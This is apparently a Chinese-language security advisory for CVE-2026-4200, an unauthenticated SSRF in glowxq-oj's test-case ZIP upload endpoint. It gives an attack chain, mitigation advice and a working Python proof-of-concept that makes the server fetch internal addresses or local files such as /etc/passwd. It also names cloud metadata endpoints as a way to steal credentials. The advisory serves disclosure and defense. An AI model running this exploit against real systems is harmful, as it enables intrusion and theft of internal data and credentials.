CVE-2026-4200 glowxq-oj uploadTestcaseZipUrl函数SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-4200

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

glowxq glowxq-oj

漏洞概述

CVE-2026-4200是glowxq glowxq-oj系统中发现的一个高危安全漏洞，CVSS评分7.3。该漏洞存在于ProblemCaseController.java文件的uploadTestcaseZipUrl函数中，攻击者可以利用该漏洞发起服务器端请求伪造(SSRF)攻击。由于漏洞存在于上传测试用例ZIP文件的功能中，攻击者可以构造恶意请求，诱导服务器向内部网络资源或外部恶意服务器发起请求，从而读取敏感信息、扫描内网服务或发起进一步的攻击。此漏洞影响glowxq-oj项目直至commit 6f7c723090472057252040fd2bbbdaa1b5ed2393的所有版本。由于漏洞已在互联网上公开，且厂商未对此披露做出回应，建议用户立即采取防护措施。

技术细节

该SSRF漏洞位于glowxq-oj项目的ProblemCaseController.java文件中，具体在uploadTestcaseZipUrl方法。攻击者通过构造特殊的ZIP文件上传请求，可以控制服务器发起任意HTTP请求。漏洞原因在于该函数未能正确验证和过滤用户提供的URL参数，导致攻击者可以指定内部IP地址（如127.0.0.1、192.168.x.x）、本地文件协议（file://）或其他内部服务地址。攻击者利用此漏洞可以：1) 扫描和访问内网服务；2) 读取本地敏感文件；3) 利用云元数据服务（如AWS 169.254.169.254）获取凭证；4) 对内部服务发起攻击。由于该功能无需认证即可访问，攻击门槛较低，危害性较大。攻击者可以通过修改上传请求中的URL参数为目标地址，服务器将执行该请求并返回响应内容。

攻击链分析

STEP 1

步骤1

攻击者识别目标glowxq-oj系统，访问/api/problem/case/upload-testcase-zip-url端点

STEP 2

步骤2

攻击者构造恶意POST请求，在url参数中指定内部IP地址、本地文件或其他内部服务地址

STEP 3

步骤3

服务器接收到请求后，uploadTestcaseZipUrl函数未验证URL合法性，直接发起请求到攻击者指定的目标地址

STEP 4

步骤4

服务器将内部服务的响应返回给攻击者，实现信息泄露或内网服务探测

STEP 5

步骤5

攻击者利用获取的信息进一步发起深度攻击，如获取云凭证、访问数据库等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-4200 SSRF PoC for glowxq-oj
# Target: glowxq-oj ProblemCaseController uploadTestcaseZipUrl function

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in uploadTestcaseZipUrl function
    
    Args:
        target_url: Base URL of vulnerable glowxq-oj instance
        internal_target: Internal resource to target (e.g., http://127.0.0.1:8888, file:///etc/passwd)
    
    Returns:
        Response from the internal target
    """
    endpoint = f"{target_url}/api/problem/case/upload-testcase-zip-url"
    
    # Construct malicious payload
    payload = {
        'url': internal_target,
        'problemId': '1'
    }
    
    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-4200_poc.py <target_url> <internal_target>")
        print("Example: python cve-2026-4200_poc.py http://vulnerable-host:8080 http://127.0.0.1:8888/admin")
        sys.exit(1)
    
    target = sys.argv[1]
    internal = sys.argv[2]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Internal target: {internal}")
    print("[*] Sending malicious request...")
    
    result = exploit_ssrf(target, internal)
    print(f"[+] Response:\n{result}")

影响范围

glowxq glowxq-oj <= 6f7c723090472057252040fd2bbbdaa1b5ed2393

防御指南

临时缓解措施

由于该漏洞已被公开且厂商未及时响应，建议采取以下临时措施：1) 在Web应用防火墙中配置规则，拦截包含内网IP、localhost、file://等协议的请求；2) 临时禁用uploadTestcaseZipUrl功能或限制其访问权限；3) 对该接口实施严格的认证和授权控制；4) 监控相关日志，及时发现异常请求行为；5) 配置网络ACL，限制服务器的出站访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4200
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4200
3 Details https://www.cvedetails.com/cve/CVE-2026-4200/
4 VulDB https://vuldb.com/cve/CVE-2026-4200
5 Link https://fx4tqqfvdw4.feishu.cn/docx/K0SjdZTPRo31LExSdlfcC3jwn1c?from=from_copylink
6 Link https://vuldb.com/?ctiid.351112
7 Link https://vuldb.com/?id.351112
8 Link https://vuldb.com/?submit.770476